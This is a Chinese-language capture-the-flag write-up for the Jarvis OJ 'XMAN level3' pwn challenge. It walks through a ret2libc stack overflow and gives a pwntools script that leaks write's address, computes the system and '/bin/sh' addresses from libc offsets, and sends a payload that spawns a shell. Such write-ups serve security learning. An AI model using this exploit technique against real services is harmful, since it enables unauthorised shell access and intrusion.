18.9.19 Jarvis OJ PWN----[XMAN]level3
打开压缩包,看到了两个文件,surprise! 有个lib文件
checksec一波,发现没有保护栈
![18.9.19 Jarvis OJ PWN----[XMAN]level3_第1张图片](http://img.e-com-net.com/image/info8/8727de2f98c94d84a0231dd790d2584d.jpg)
那就先找到可以栈溢出的地方哟,如下
![18.9.19 Jarvis OJ PWN----[XMAN]level3_第2张图片](http://img.e-com-net.com/image/info8/74be0a6b1a974ca8a0a6d8ecc5e80328.png)
可是问题来了,没有system函数,也没有/bin/sh字符串,但是在链接库(lib文件)中可以找到,如下
![18.9.19 Jarvis OJ PWN----[XMAN]level3_第3张图片](http://img.e-com-net.com/image/info8/f07e733c15934b40a4a018e730174848.jpg)
我们显然必须要知道system函数与/bin/sh字符在内存中的地址,之前我也不知道该怎么找,开始向大佬学姿势
key_point:函数在内存中的地址和libc文件中的偏移的差相等!!!!!!
发现了什么么,在第一个主文件中,我们可以分析出write函数的地址,那么根据偏移量就可以把system函数的内存地址求出来了
怎么构造缓冲区覆盖回去呢:
1. 恢复局部变量的ebp偏移(0x88个字节)
2. 覆盖保存的ebp(0x4个字节)
3. 覆盖返回地址(0x4个字节) ------- write函数
4. 返回到vulner函数再次执行
5. 定位到system函数上去
这里就不得不提到write函数了,我们给它了返回地址,但是还需要参数
write:ssize_t write(int fd, const void *buf, size_t nbyte);
成功:返回写入的字节数; //这样就有了write函数的地址了
失败:返回-1并设置errno
上脚本:
#函数主体
cn.recv()
writegot = bin.got["write"]
payload='a'*0x88+'a'*4+p32(bin.symbols['write'])+p32(bin.symbols['vulnerable_function'])+p32(1)+p32(writegot)+p32(4)
cn.send(payload)
write_addr= u32(cn.recv(4)) #write_got
system_addr = write_addr - libc.symbols['write'] + libc.symbols['system']
sh_addr= write_addr - libc.symbols['write'] + libc.search('/bin/sh').next()
payload2 = 'a'*(0x88+4) + p32(system_addr) + p32(0x11111111) + p32(sh_addr)
cn.recv()
cn.sendline(payload2)